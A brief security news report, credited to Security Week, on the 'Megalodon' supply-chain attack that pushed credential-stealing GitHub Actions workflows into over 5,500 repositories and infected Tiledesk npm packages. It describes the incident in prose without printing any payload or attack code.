Unprecedented ‘Megalodon’ Attack Breaches Over 5,500 GitHub Repositories
An automated supply chain attack of unprecedented scale, dubbed “Megalodon”, hit GitHub on May 18, 2026. This attack injected malicious backdoors into more than 5,500 repositories within a mere six-hour window, marking it as one of the most aggressive GitHub Actions poisoning campaigns ever witnessed.
Cybersecurity firm SafeDep reports that the attackers pushed 5,718 malicious commits between 11:36 and 17:48 UTC. They utilized throwaway accounts and forged identities such as “build-bot” and “auto-ci” to mimic routine automated maintenance. The campaign deployed GitHub Actions workflows containing base64-encoded payloads. These were specifically designed to steal CI secrets, cloud credentials, SSH keys, and OIDC tokens, exfiltrating data to a command-and-control server.
The attack had a significant impact on Tiledesk, an open-source live chat platform. Nine of its repositories were compromised. The maintainer unknowingly published seven infected versions of the @tiledesk/tiledesk-server package to npm between May 19-21. A follow-up analysis by Hudson Rock revealed that over 33% of affected accounts were compromised through infostealer malware infections, enabling the attackers to steal GitHub credentials.
“We’ve entered a new supply chain attack era,” warned Moshe Siman Tov Bustan of OX Security, predicting an “endless wave” of similar attacks targeting developers worldwide.
Source: Security Week